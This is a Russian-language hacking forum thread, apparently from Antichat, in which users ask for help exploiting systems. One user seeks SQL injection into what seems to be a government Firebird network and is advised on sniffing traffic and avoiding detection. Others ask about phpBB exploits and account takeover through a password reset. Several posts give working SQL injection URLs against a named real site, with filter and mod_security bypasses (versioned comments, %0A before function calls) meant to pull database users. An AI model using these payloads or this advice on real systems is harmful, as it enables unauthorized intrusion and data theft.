Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Yrovdul

    Yrovdul New Member

    Joined:
    9 May 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Имеется SQL сервер - Red database. Веб-приложения нету, имеется клиентское приложение написанное на C++. Связь между сегментами выполняется через интернет по VPN. Можно ли выполнить SQL инъекцию?
     
  2. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    331
    Reputations:
    6
    Мало инфы. Что за сегменты? Обращение к Сиукул-серверу по защищенному протоколу? Если нет, то можно отправлять запросы прямо так из SQL IDE инжекция не нужна, часто такие приложения делаються для внутренней сети.
    Что за SQL-сервер, возможно если крутой сервер типа Оракла, там могучие средства для разделения полномочий и прав. Возможно доступна только не приватная инфа
     
  3. Yrovdul

    Yrovdul New Member

    Joined:
    9 May 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Дистрибутив Firebird - Red DataBase. Мне необходимо найти уязвимость для SQL инъекции[​IMG]
     
  4. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    331
    Reputations:
    6
    ХЗ Firebird никогда с ней не имел дел.
    в архитектуре не вижу ВПН и вообще каких то навороченных защит. Походу классическая двухзвенная архитектура.

    Если не знаешь никаких утилит мониторинга для Firebird, то вариантов два:
    Собрать снифером дамп и посмотреть там на наличии уязвимых SQL-запросов, но Attention походу контора госслужбы какой то тебя могут спалить, когда снифер работает это очень заметно в сети...

    если запросы не найдешь то вариант второй: reverse-engineering клиентского приложения.

    Кароч кратко, технология SQL-инжектинга тем и хороша что не зависит от сопутствующего ПО, твоя схема вполне может быть сплотабельная, даже более чем Вэб-приложения, единственно задача поиска требует более сложных технических решений.
     
    Yrovdul likes this.
  5. Yrovdul

    Yrovdul New Member

    Joined:
    9 May 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    1) VPN вверху в облачке написано. Его роль выполняет АПКШ Континент. Справа сегмент сети на уровне города. Слева региональный уровень. Есть ещё 3й на уровне страны.
    2) http://www.ibase.ru/d_tools/ Вот вроде бы утилиты для мониторинга и администрирования?
    3) Что значит сплотабельная?
     
    #1885 Yrovdul, 11 May 2017
    Last edited: 11 May 2017
  6. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    331
    Reputations:
    6
    А да, точно не заметил, в таком виде ВПН тебе не помеха. Если ты кончено будешь с рабочего места .
    Очень хорошо, вот работай. Или ты предлагаешь мне их скачать?

    Значит подвержена атаке при помощи сплоета.
     
    Yrovdul likes this.
  7. mcmagnus

    mcmagnus New Member

    Joined:
    24 Apr 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    доброго времени суток господа. Подскажите, есть ли уязвимости на форумах phpBB 3.0.5 и выше???
    По гуглю ничего толкового не нашел, в секурити лаб тоже.
     
  8. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    496
    Likes Received:
    95
    Reputations:
    24
    Есть саит которыи не разрешает регать больше одного акаунта 1 емаилом но при вводе (пробел)123@mail.ru почта считается как другая и подтверждение по почте все работает это уже баг какие последующие баги может открыть данный баг?
     
  9. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    возможно, что-то в духe " admin@site.com mymail@mail.com "
    " admin@site.com, mymail@mail.com "
    а потом востановление пароля...

    У меня другой вопрос, может cat1vo ответит на него...

    Есть сайт, сайт мебельный.
    http://mt.ua/

    Надо найти в нем баги, что бы взяли на работу.
    раскодировав получаем

    что это такое. с чем его едят?
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    можно же погуглить, токен от межсайтовой подделки запросов

    http://repository.root-me.org/Explo... loose comparison - Type Juggling - OWASP.pdf - примерно в середине рассказывает про баг в ларавеле для обхода проверки XSRF, вообще хорошая pdf, про типы данных и проверки :)
     
    _________________________
    crlf and ACat like this.
  11. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    ти клясный
     
  12. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    фу чел( плюсануть пост вполне достаточно
     
    _________________________
  13. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    чувак, я - Кот.
     
  14. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Парни подскажите что можно попробовать в такой ситуации:

    par1=sleep(20) -> time = 20024 ms
    par1=eval(sleep(20)) -> time 2000ms
    и так далее....

    Как определить что за интерпретатор принимает параметр? Чей код инжектить?
     
  15. mcmagnus

    mcmagnus New Member

    Joined:
    24 Apr 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Справшивал по phpbb 3.0.5 - есть в нем уязвимости??? Кто нибудь ответит??? ))
     
  16. brown

    brown Member

    Joined:
    16 Oct 2016
    Messages:
    195
    Likes Received:
    7
    Reputations:
    0
    google phpbb 3.0.5 exploit
     
    mcmagnus likes this.
  17. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    256
    Likes Received:
    87
    Reputations:
    1
    Добрый подскажите, как раскрутить данную sql (параметр id)
    Авторизация:
    Code:
    bringthemes.com/natural-food/home-1/admin/ (demo/demo)
    Пробую:
    Code:
    bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl

    но в ответ постоянная загрузка и отрубает (Error - Connection reset)
    Подскажите что фильтрует и как обойти?
    обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
     
  18. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Зачем идти в Москву через Китай
    Code:
    http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF
    Бапассить select можно старыми добрыми комментами
    А байпассить функции с помощью %0A перед ()

    UPD: И ты используешь error-based хотя здесь самый обычный UNION
     
    _________________________
  19. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    /vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23

    Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
     
  20. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    498
    Reputations:
    154
    Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше
     
    _________________________
    Gorev likes this.
Loading...